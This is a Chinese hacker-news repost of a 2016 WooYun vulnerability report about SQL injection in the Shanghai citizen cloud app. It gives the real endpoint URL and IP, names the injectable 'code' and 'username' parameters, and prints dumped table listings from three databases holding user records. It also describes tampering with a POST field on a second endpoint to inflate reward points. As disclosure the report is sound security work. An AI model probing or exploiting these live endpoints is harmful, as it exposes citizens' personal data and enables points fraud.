记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

上海市民云APP某处SQL注入

2016-04-15 07:00

APP是从支付宝里面下载的··

打开APP,抓包过程中发现一处链接为

code 区域
http://218.78.214.24:8080/live/service/top/hasNewOrgan?code=310112110&username=eshimin34188390





参数code和username都存在注入



001.jpg





002.jpg





code 区域
Database: live

+------------------+---------+

| Table | Entries |

+------------------+---------+

| society_user | 42489 |

| commercial | 6012 |

| notice | 2216 |

| temp_com | 1620 |

| services_discuss | 437 |

| organ | 214 |

| society | 214 |

| dic_service | 31 |

+------------------+---------+







code 区域
Database: live_online

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| organ_type_remind | 1139597 |

| organ_masg_remind | 414863 |

| society_user | 133187 |

| affairsorganelation | 39777 |

| notice | 12991 |

| commercial | 7438 |

| favorite | 3027 |

| temp_com | 1620 |

| affairsarchives | 1273 |

| services_discuss | 850 |

| affairsorder | 511 |

| affairsdefine | 280 |

| society | 252 |

| organ | 217 |

| enumeration | 88 |

| recommend_service | 75 |

| commercial_set_top | 42 |

| dic_service | 39 |

| geo | 19 |

| vacation | 12 |

| subject | 9 |

| affair_type | 8 |

| recommend_affair | 7 |

+---------------------+---------+







code 区域
Database: live_offline

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| society_user | 42397 |

| affairsorganelation | 41211 |

| commercial | 6011 |

| notice | 1901 |

| temp_com | 1620 |

| affairsarchives | 1189 |

| services_discuss | 438 |

| favorite | 411 |

| affairsdefine | 259 |

| society | 249 |

| organ | 217 |

| enumeration | 86 |

| dic_service | 31 |

| geo | 19 |

| affairsorder | 16 |

| affair_type | 8 |

| recommend_affair | 4 |

| subject | 4 |

+---------------------+---------+











另外一处设计缺陷,可刷市民问答积分。

code 区域
http://apps.eshimin.com/survey/invest/addDcResult



POST数据如下,修改jifen后面的数值,即可刷积分。

003.jpg





004.jpg





以前有个活动,可以用10积分抽奖一次。现在利用不了~以后可能会被利用。

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0195769

阅读:89669 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“上海市民云APP某处SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云